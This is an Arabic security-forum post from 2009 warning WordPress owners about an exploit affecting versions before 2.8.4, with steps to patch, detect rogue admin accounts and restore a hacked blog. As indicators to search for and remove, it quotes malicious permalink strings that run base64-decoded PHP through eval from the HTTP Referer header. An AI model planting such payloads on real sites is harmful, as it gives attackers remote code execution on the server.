| ||||||
 |
| | LinkBack | أدوات الموضوع | انواع عرض الموضوع |
|
#1
09-29-2009, 07:30 AM
| ||
| ||
| الســــلام عليكمم ورحمة الله وبركاته شباب*** اقتباس: توني قريا خبر "تحذير" من موقع الوورد برس الغني عن التعريف بتحديث بيانات جميع مستخدمين الوورد برس* سواء كأدمن - يوزر * حيث اعربوا بأن مستخدمين الوورد برس يتعرضون لهذا النوع من الإكسبلويت كل ساعه ! حيث يقوم المخترق بزع عضوية الأدمن عند تسجيله بلمدونة فقط ! Otto42 of OttoDestruct* a key WordPress developer and supporter* reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!! Update your WordPress blog before you continue reading this post. That’s how critical this issue is. للوقاية من الثغره: كود:1- تحديث مدونتك الان* الإكسبلويت "0-d4y" يعمل على جميع إصدارات الوورد برس إلا 2.8.4 . 2- إصدار تقرير من الوورد برس : كيفية الحفـــاظ على مدونتك امنة* بلإضافة الى معلومات حول كيفية عمل تحديث فوري لمدونتك لإيقاف هذه الإكسبلويت ( وورم ). 3- إذا كنت تستخدم إصدار وورد برس رقم 2.7 سوف يظهر لك عند دخولك لوحة التحكم تحذير لتحديث مدونتك لأخر إصدار* وبحالة كنت تستخدم نسخة اقدم من 2.7 فوجب عليكم التحديق حالا* بحالة لم تستطع معرفة إصدار مدونتك** وجب عليكم التحديث عبر الموقع الرسمي للورد برس من هنـــا حالا. 4- إستخدام إضافة وورد برس لحماية مدونتك: هذه الحالة ستكون إستثنائية لك بعد "تحديثك حاليا" لإصدار مدونتك* لاكن يوجد بعض الإضافات تساعدك بحماية مدونتك من التعليقات وغيرها من الامور المهمة** لاكن بحالة عدم ترقية مدونتك* وجب عليكم الترقية الأن. 5- وورد برس غير أمن: برنامج وورد برس مامن بلحماية البرمجية والشكلية بنحو 97% من قبل خبيرين برمجة امنية للمواقع وتطويرات الويب* لاكن لايوجد برنامج على وجه الارض الا وتعرض للإختراق* وهذا الهجوم كان متوقع من قبل ! لاكن بإصدار وورد برس 2.8.4 تم ترقيعه بأمان ! وبحالة وجد او ظهر اي ثغره جديدة سواء خطيرة ام لا* ستقوم وورد برس بإعلام اعضائها على الترقيع بلحظات قليلة من قبل الخبرات بلتطوير والترقيع الامني المعد لها* حيث تملك وورد برس اكثر من 5*317*360 مليون مشترك بلعالم ! 6- التخوف او الملل من التحديث حالا: إن هذا التحديث مطلوب من جميع اعضاء وورد برس* حيث ان هذه الثغره تعتبر قاتلة لمدونتك* فوجب عليكم الترقيع حالا وان لاتأجل الترقيع حتى وقت الإختراق ! ويفضل ايضا التاكد من تحديث إضافات الوورد برس لديك "إن وجد تحديث لها" حالا . بحالة وجد تحديثات للوورد برس* فسيتم كتابة تحديث للموضوع داخل موضوعنا هذا لمنتدى سيكيورتي رولز* وسيتم إبلاغ اعضائنا بنفس اللحظة. * اللحين معظم الشباب ومالكين المواقع الي يستخدمون الوورد برس يتسالون عن مدوناتهم ؟ هل هي مخترقة او لا ؟ اولا: يتم الإختراق عن طريق ثغره ( برايفت ) يتم تحديث معلومات العضو المسجل ( المخترق ) بحيث يصبح بمرتبه الأدمن ( المستهدف ) فللتاكد منها وجب عليكم الذهاب الى لوحة الأدمن* والتاكد من وجود عضويتك فقط ! فإن وجدت عضوية اخرى "تجهل صاحبها" فأنت مخترق ووجب عليكم إيقاف موقعك حالا* والافضل ان تغير مسار ملفاتك لمسار اخر "مؤقتا" والتاكد من نظافة ملفاتك من اي "كود خبيث" او "شل كود" بهم **وبعدها يقوم المخترق "بحالة عدم تاكدك او ترقيعك للمدوتة" بلولوج لمعلومات مهمة بموقعك مثل معلومات بريدك الإلكتروني إن كنت تحتفظ به بلمدونة* معلومات شخصية ومواضيع شخصية اخرى* ويمكنه ايضا من إختراق مدونتك بنفس اللحظة عن طريق رفع " شل كود " لمدونتك والتحكم بلموقع كامل ! وإن كانت إستضافتك ذات حماية عادية او متوسطة* وذالك يعتمد على المخترق* فيتم إختراق سيرفرك كامل من هذه الثغره* فنتمنى التحديث الفوري اللحين لمدونتك لحماية موقعك ومدونتك وسيرفرك ايضا ! صورة توضيحية  Click this bar to view the full image.ثانيا: التاكد من "روابط دائمة" مدونتك ! مثال %&(%7B$%7Beval(base64_decode($_SERVER%5B HTTP_REFERER%5D))%7D%7D|.+)&%/ او كود:“/%&(% 7B$%7Beval(base64_decode($_SERVER%5BHTTP _EXECCODE%5D))%7D%7D|.+)&% او كود:%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ هذه الأكواد هي عباره عن تشفير نوع "Eval" و “base64_decode” * يمكن المخترق من رفع شل كود لموقعك ( سيرفرك ) وإختراقك كامل.
كود:فوجب عليكم إتباع النقطة الاولى الي ذكرتها من قبل* وإن تم وجودهم وجب عليكم حذفهم من "الروابط" بلوحة تحكمكم. ثالثا: التاكد من عدم وجود "أدمن" إضافي بلوحة التحكم** معظم الاوقات لإصدارات الوورد برس القديمة 2.7 واقدم ** يوجد بعض الهاكات "تخفي" الأعضاء سواء أدمن او يوزر** فتستطيع من خلال الذهاب للوحة التحكم ومن ثم الأعضاء إختيار السورس كود للصفحة والبحث فيها عن Administrator او Admin او user_ ** فبحالة عدم وجود شي فإن شاء الله انت بامان*** صورة توضيحية  Click this bar to view the full image.اللحين بعد المرور بكل هذه التوضيحات ماتوقع بإذن الله وجود اي سؤال او إستفسار لحد من الشباب** ولاكن لو وجد فإن شاء الله نحلها لكم*** لاكن بحالة "لاسمح الله" تم إختراق مدونتكم* او العبث بلقاعدة (شي اكيد المخترق راح يقوم بلعبث بلقاعدة* او رفع شل او اي شي اخر يبقيه علموقع ( Backdoor ) له*** فلحل الافضل والأمن لكم هو تحميل هذه الإضافة للورد برس WordPress-to-WordPress Import WordPress Plugin ومن ثم عن طريقها ( بعد تثبيتها ) نقوم بإستخدام Export ( ضغط وتحميل ) معلومات مدونتنا من ( ردود - صور - ملفات - مواضيع ) كملف XML وحفظة بجهازنا * ومن ثم نقوم بتامين ( صور المدونة وملفاتنا إن وجدت ) وهذه المسارات عادة تكون داخل المدونة /home/username/public_html/wp-content/uploads او كود:/home/username/public_html/images بلحالة هذه بعد الحفظ نقوم بحذف المدونة ( كاملة ) ومن ثم تصطيب مدونة جديدة من هذا الرابط ( الإصدار الاخير للوررد برس 2.8.4 - إضغط هنا ) * ومن ثم بعد التركيب نقوم بتركيب الإضافة الي قمنا بسحب معلومات مدونتنا فيها* ومن ثم نقوم بلضفط على Import للملف الي سحبناه من المدونة. وبإذن الله ترجع المدونة 100% نظيفة من اي شل كود او كود خبيث من المخترق * وايضا من اي ( شك ) بنفسنا بعد الإختراق . للتقليل من إختراق المدونات ( يرجى ) من الجميع نشر الخبر وتحذير كل مالك مدونة من هذه الإكسبلويت عبر هذا الموضوع او منكم شخصيا ( مسنجر او منتدى )** بحيث تقلل من هذه الإختراقات لمدونات الوورد برس** وبحالة وجود اي شي إضافي هذا الدعم الفني
__DEFINE_LIKE_SHARE__
( برنامج الوورد برس من هنا ). الثغره ( الكود ) لم يتم الإعلان عنها بمواقع الحماية حاليا *** مثل ماقلت قبل الثغره اكيد برايفت مازالت* واتوقع صعب تظهر للجميع حاليا.  |
|
| مواقع النشر (المفضلة) |
العرض العادي
| |
المواضيع المتشابهه | ||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| معادله خطيرة خطيرة في هذي الصورة وأنــت لا تعلم | محروم.كوم | منتدى أخبار المواقع والمنتديات العربية والأجنبية | 0 | 04-17-2010 10:40 PM |
| مجموعة خطيرة خطيرة روعة من الصورة والخلفيات للجوال **Mobile Wallpaper ** | BeTheChange889 | هواتف , مسجات , وسائط , برامج , ثيمات , نغمات , بلوتوث | 4 | 03-15-2010 03:30 PM |
| مجموعة خطيرة خطيرة روعة من الصورة والخلفيات للجوال **Mobile Wallpaper ** | محروم.كوم | منتدى أخبار المواقع والمنتديات العربية والأجنبية | 0 | 12-08-2009 11:50 AM |
| مجموعة خطيرة خطيرة روعة من الصورة والخلفيات للجوال **Mobile Wallpaper ** | محروم.كوم | منتدى أخبار المواقع والمنتديات العربية والأجنبية | 0 | 12-02-2009 05:51 AM |
| 24 ثغره ببرنامج HyperVM !! خطــــيره جدا | محروم.كوم | منتدى أخبار المواقع والمنتديات العربية والأجنبية | 0 | 06-19-2009 07:10 PM |
الساعة الآن 05:31 AM
- اخبار رياضية
- اخبار الامارات
- اخبار ريال مدريد
- اخبار برشلونه
- العاب فلاش
- مسلسلات وافلام
- مسجات
- فيديو كليبات
- سيارات للبيع
- ارقام سيارات
- ارقام هواتف
- هواتف للبيع
- حيوانات للبيع
- قوارب ويخوت للبيع
- ملابس واكسسوارات
- ساعات ومجوهرات
- اناشيد اسلامية
- نغمات اناشيد
- نغمات اسلامية
- ادعية اسلامية
- رقية شرعية
- قران كريم
- ديبيات اسلامية
- اذكار المسلم
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227